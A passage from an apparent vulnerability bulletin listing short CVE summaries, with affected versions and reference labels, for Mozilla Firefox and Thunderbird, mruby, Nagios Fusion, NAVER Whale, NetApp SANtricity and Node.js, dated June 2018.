A buffer overflow occurs when drawing and validating elements using Direct 3D 9 with the ANGLE graphics library, used for WebGL content. This is due to an incorrect value being passed within the library during checks and results in a potentially exploitable crash. Note: This attack only affects Windows operating systems. Other operating systems are unaffected. This vulnerability affects Thunderbird < 52.5.2, Firefox ESR < 52.5.2, and Firefox < 57.0.2.2018-06-11not yet calculatedCVE-2017-7845
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Same-origin policy protections can be bypassed on pages with embedded iframes during page reloads, allowing the iframes to access content on the top level page, leading to information disclosure. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7787
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability with content viewer listeners that results in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7751
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when an editor DOM node is deleted prematurely during tree traversal while still bound to the document. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7809
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The "Mark of the Web" was not correctly saved on Windows when files with very long names were downloaded from the Internet. Without the Mark of the Web data, the security warning that Windows displays before running executables downloaded from the Internet is not shown. Note: This attack only affects Windows operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7765
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory corruption resulting in a potentially exploitable crash during garbage collection of JavaScript due errors in how incremental sweeping is managed for memory cleanup. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.2018-06-11not yet calculatedCVE-2017-5410
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free can occur when events are fired for a "FontFace" object after the object has been already been destroyed while working with fonts. This results in a potentially exploitable crash. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.2018-06-11not yet calculatedCVE-2017-5402
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur during XSL transformations when the source document for the transformation is manipulated by script content during the transformation. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.2018-06-11not yet calculatedCVE-2018-5097
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read during the processing of glyph widths during text layout. This results in a potentially exploitable crash and could allow an attacker to read otherwise inaccessible memory. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5447
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
EXPLOIT-DB
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read when an HTTP/2 connection to a servers sends "DATA" frames with incorrect data content. This leads to a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5446
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow can occur when manipulating Accessible Rich Internet Applications (ARIA) attributes within the DOM. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7785
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 59, Firefox ESR 52.7, and Thunderbird 52.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.2018-06-11not yet calculatedCVE-2018-5150
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability when holding a selection during scroll events. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5441
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability with the frameloader during tree reconstruction while regenerating CSS layout when attempting to use a node in the tree that no longer exists. This results in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-5472
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
URLs containing certain unicode glyphs for alternative hyphens and quotes do not properly trigger punycode display, allowing for domain name spoofing attacks in the location bar. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.2018-06-11not yet calculatedCVE-2017-5383
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds write in the Graphite 2 library triggered with a maliciously crafted Graphite font. This results in a potentially exploitable crash. This issue was fixed in the Graphite 2 library as well as Mozilla products. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5436
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
In the Windows 10 April 2018 Update, Windows Defender SmartScreen honors the "SEE_MASK_FLAG_NO_UI" flag associated with downloaded files and will not show any UI. Files that are unknown and potentially dangerous will be allowed to run because SmartScreen will not prompt the user for a decision, and if the user is offline all files will be allowed to be opened because Windows won't prompt the user to ask what to do. Firefox incorrectly sets this flag when downloading files, leading to less secure behavior from SmartScreen. Note: this issue only affects Windows 10 users running the April 2018 update or later. It does not affect other Windows users or other operating systems. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.2018-06-11not yet calculatedCVE-2018-5174
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.2018-06-11not yet calculatedCVE-2017-5375
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
EXPLOIT-DB
EXPLOIT-DB
EXPLOIT-DB
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An integer overflow can occur during conversion of text to some Unicode character sets due to an unchecked length parameter. This vulnerability affects Firefox ESR < 52.7 and Thunderbird < 52.7.2018-06-11not yet calculatedCVE-2018-5144
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability in SVG Animation has been discovered. An exploit built on this vulnerability has been discovered in the wild targeting Firefox and Tor Browser users on Windows. This vulnerability affects Firefox < 50.0.2, Firefox ESR < 45.5.1, and Thunderbird < 45.5.1.2018-06-11not yet calculatedCVE-2016-9079
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
EXPLOIT-DB
EXPLOIT-DB
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when the widget listener is holding strong references to browser objects that have previously been freed, resulting in a potentially exploitable crash when these references are used. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.2018-06-11not yet calculatedCVE-2018-5099
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A vulnerability while parsing "application/http-index-format" format content where uninitialized values are used to create an array. This could allow the reading of uninitialized memory into the arrays affected. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5445
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An integer overflow vulnerability in the Skia library when allocating memory for edge builders on some systems with at least 8 GB of RAM. This results in the use of uninitialized memory, resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.2018-06-11not yet calculatedCVE-2018-5095
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The Resource Timing API incorrectly revealed navigations in cross-origin iframes. This is a same-origin policy violation and could allow for data theft of URLs loaded by users. This vulnerability affects Firefox < 57, Firefox ESR < 52.5, and Thunderbird < 52.5.2018-06-11not yet calculatedCVE-2017-7830
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Thunderbird 45.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.2018-06-11not yet calculatedCVE-2017-5398
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability occurs during certain text input selection resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5432
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Using SVG filters that don't use the fixed point math implementation on a target iframe, a malicious page can extract pixel values from a targeted user. This can be used to extract history information and read text values across domains. This violates same-origin policy and leads to information disclosure. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.2018-06-11not yet calculatedCVE-2017-5407
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur while enumerating attributes during SVG animations with clip paths. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.2018-06-11not yet calculatedCVE-2018-5154
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when flushing and resizing layout because the "PressShell" object has been freed while still in use. This results in a potentially exploitable crash during these operations. This vulnerability affects Firefox < 57, Firefox ESR < 52.5, and Thunderbird < 52.5.2018-06-11not yet calculatedCVE-2017-7828
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
CONFIRM
MLIST
MLIST
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
If a page is loaded from an original site through a hyperlink and contains a redirect to a "data:text/html" URL, triggering a reload will run the reloaded "data:text/html" page with its origin set incorrectly. This allows for a cross-site scripting (XSS) attack. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5466
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 52, Firefox ESR 52, and Thunderbird 52. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5430
BID
SECTRACK
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 54, Firefox ESR 52.2, and Thunderbird 52.2. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7779
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A possibly exploitable crash triggered during layout and manipulation of bidirectional unicode text in concert with CSS animations. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5449
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow occurs when drawing and validating elements with the ANGLE graphics library, used for WebGL content. This is due to an incorrect value being passed within the library during checks and results in a potentially exploitable crash. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.2018-06-11not yet calculatedCVE-2017-7824
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow vulnerability while parsing "application/http-index-format" format content when the header contains improperly formatted data. This allows for an out-of-bounds read of data from memory. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5444
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Sites can bypass security checks on permissions to install lightweight themes by manipulating the "baseURI" property of the theme element. This could allow a malicious site to install a theme without user interaction which could contain offensive or embarrassing images. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.2018-06-11not yet calculatedCVE-2018-5168
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Use-after-free while manipulating DOM events and removing audio elements due to errors in the handling of node adoption. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6.2018-06-11not yet calculatedCVE-2016-9899
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
EXPLOIT-DB
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read while processing SVG content in "ConvolvePixel". This results in a crash and also allows for otherwise inaccessible memory being copied into SVG graphic content, which could then displayed. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5465
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
EXPLOIT-DB
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An error in the "WindowsDllDetourPatcher" where a RWX ("Read/Write/Execute") 4k block is allocated but never protected, violating DEP protections. Note: This attack only affects Windows operating systems. Other operating systems are not affected. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7782
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read occurs when applying style rules to pseudo-elements, such as ::first-line, using cached style data. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7753
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Event handlers on "marquee" elements were executed despite a strict Content Security Policy (CSP) that disallowed inline JavaScript. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6.2018-06-11not yet calculatedCVE-2016-9895
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A potential memory corruption and crash when using Skia content when drawing content outside of the bounds of a clipping region. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5467
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An existing mitigation of timing side-channel attacks is insufficient in some circumstances. This issue is addressed in Network Security Services (NSS) 3.26.1. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.2018-06-11not yet calculatedCVE-2016-9074
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during changes in style when manipulating DOM elements. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5442
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when manipulating arrays of Accessible Rich Internet Applications (ARIA) elements within containers through the DOM. This results in a potentially exploitable crash. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.2018-06-11not yet calculatedCVE-2017-7818
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free error can occur when manipulating ranges in selections with one node inside a native anonymous tree and one node outside of it. This results in a potentially exploitable crash. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.2018-06-11not yet calculatedCVE-2017-5404
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
EXPLOIT-DB
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A crash triggerable by web content in which an "ErrorResult" references unassigned memory due to a logic error. The resulting crash may be exploitable. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.2018-06-11not yet calculatedCVE-2017-5401
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
If right-to-left text is used in the addressbar with left-to-right alignment, it is possible in some circumstances to scroll this text to spoof the displayed URL. This issue could result in the wrong URL being displayed as a location, which can mislead users to believe they are on a different site than the one loaded. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.2018-06-11not yet calculatedCVE-2018-5117
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
File downloads encoded with "blob:" and "data:" URL elements bypassed normal file download checks though the Phishing and Malware Protection feature and its block lists of suspicious sites and files. This would allow malicious sites to lure users into downloading executables that would otherwise be detected as suspicious. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.2018-06-11not yet calculatedCVE-2017-7814
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability in SMIL animation functions occurs when pointers to animation elements in an array are dropped from the animation controller while still in use. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5433
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur during font face manipulation when a font face is freed while still in use, resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.2018-06-11not yet calculatedCVE-2018-5104
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow in WebGL triggerable by web content, resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5459
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
External resources that should be blocked when loaded by SVG images can bypass security restrictions through the use of "data:" URLs. This could allow for cross-domain data leakage. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6.2018-06-11not yet calculatedCVE-2016-9900
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An error in argument length checking in JavaScript, leading to potential integer overflows or other bounds checking issues. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.2018-06-11not yet calculatedCVE-2016-5297
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A flaw in DRBG number generation within the Network Security Services (NSS) library where the internal state V does not correctly carry bits over. The NSS library has been updated to fix this issue to address this issue and Firefox ESR 52.1 has been updated with NSS version 3.28.4. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5462
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- thunderbird_and_firefoxA lack of parameter validation on IPC messages results in a potential out-of-bounds write through malformed IPC messages. This can potentially allow for sandbox escape through memory corruption in the parent process. This vulnerability affects Thunderbird < 52.7, Firefox ESR < 52.7, and Firefox < 59.2018-06-11not yet calculatedCVE-2018-5129
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- thunderbird
 
It is possible to execute JavaScript in the parsed RSS feed when RSS feed is viewed as a website, e.g. via "View -> Feed article -> Website" or in the standard format of "View -> Feed article -> default format". This vulnerability affects Thunderbird < 52.5.2.2018-06-11not yet calculatedCVE-2017-7846
BID
SECTRACK
REDHAT
CONFIRM
MLIST
DEBIAN
CONFIRM
mozilla -- thunderbird
 
Plaintext of decrypted emails can leak through by user submitting an embedded form. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8.2018-06-11not yet calculatedCVE-2018-5185
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
Crafted CSS in an RSS feed can leak and reveal local path strings, which may contain user name. This vulnerability affects Thunderbird < 52.5.2.2018-06-11not yet calculatedCVE-2017-7847
BID
SECTRACK
REDHAT
CONFIRM
MLIST
DEBIAN
CONFIRM
mozilla -- thunderbird
 
Plaintext of decrypted emails can leak through the src attribute of remote images, or links. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8.2018-06-11not yet calculatedCVE-2018-5162
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
Crafted message headers can cause a Thunderbird process to hang on receiving the message. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8.2018-06-11not yet calculatedCVE-2018-5161
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
It is possible to spoof the filename of an attachment and display an arbitrary attachment name. This could lead to a user opening a remote attachment which is a different file type than expected. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8.2018-06-11not yet calculatedCVE-2018-5170
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
It is possible to spoof the sender's email address and display an arbitrary sender address to the email recipient. The real sender's address is not displayed if preceded by a null character in the display string. This vulnerability affects Thunderbird < 52.5.2.2018-06-11not yet calculatedCVE-2017-7829
BID
SECTRACK
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
Using remote content in encrypted messages can lead to the disclosure of plaintext. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8.2018-06-11not yet calculatedCVE-2018-5184
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
UBUNTU
DEBIAN
CONFIRM
mozilla -- thunderbird
 
RSS fields can inject new lines into the created email structure, modifying the message body. This vulnerability affects Thunderbird < 52.5.2.2018-06-11not yet calculatedCVE-2017-7848
BID
SECTRACK
REDHAT
CONFIRM
MLIST
DEBIAN
CONFIRM
mruby -- mruby
 
An issue was discovered in mruby 1.4.1. There is a heap-based buffer over-read associated with OP_ENTER because mrbgems/mruby-fiber/src/fiber.c does not extend the stack in cases of many arguments to fiber.2018-06-12not yet calculatedCVE-2018-12248
MISC
MISC
mruby -- mruby
 
An issue was discovered in mruby 1.4.1. There is a NULL pointer dereference in mrb_class, related to certain .clone usage, because mrb_obj_clone in kernel.c copies flags other than the MRB_FLAG_IS_FROZEN flag (e.g., the embedded flag).2018-06-12not yet calculatedCVE-2018-12247
MISC
MISC
mruby -- mruby
 
An issue was discovered in mruby 1.4.1. There is a NULL pointer dereference in mrb_class_real because "class BasicObject" is not properly supported in class.c.2018-06-12not yet calculatedCVE-2018-12249
MISC
MISC
nagios -- fusion
 
Nagios Fusion before 4.1.4 has XSS, aka TPS#13332-13335.2018-06-16not yet calculatedCVE-2018-12501
CONFIRM
naver -- whale
 
The path of Whale update service was unquoted in NAVER Whale before 1.0.40.7. This vulnerability can be used for persistent privilege escalation if it's available to create an executable file with System privilege by other vulnerable applications.2018-06-15not yet calculatedCVE-2018-9859
CONFIRM
netapp -- santricity_web_services_proxy_and_santricity_storage_manager
 
NetApp SANtricity Web Services Proxy versions 1.10.x000.0002 through 2.12.X000.0002 and SANtricity Storage Manager 11.30.0X00.0004 through 11.42.0X00.0001 ship with the Java Management Extension Remote Method Invocation (JMX RMI) service bound to the network, and are susceptible to unauthenticated remote code execution.2018-06-13not yet calculatedCVE-2018-5488
BID
CONFIRM
nodejs -- node.js
 
All versions of Node.js 8.x, 9.x, and 10.x are vulnerable and the severity is HIGH. An attacker can cause a denial of service (DoS) by causing a node server providing an http2 server to crash. This can be accomplished by interacting with the http2 server in a manner that triggers a cleanup bug where objects are used in native code after they are no longer available. This has been addressed by updating the http2 implementation.2018-06-13not yet calculatedCVE-2018-7161
CONFIRM
nodejs -- node.js
 
Calling Buffer.fill() or Buffer.alloc() with some parameters can lead to a hang which could result in a Denial of Service. In order to address this vulnerability, the implementations of Buffer.alloc() and Buffer.fill() were updated so that they zero fill instead of hanging in these cases. All versions of Node.js 6.x (LTS "Boron"), 8.x (LTS "Carbon"), and 9.x are vulnerable. All versions of Node.js 10.x (Current) are NOT vulnerable.2018-06-13not yet calculatedCVE-2018-7167
CONFIRM
nodejs -- node.js
 
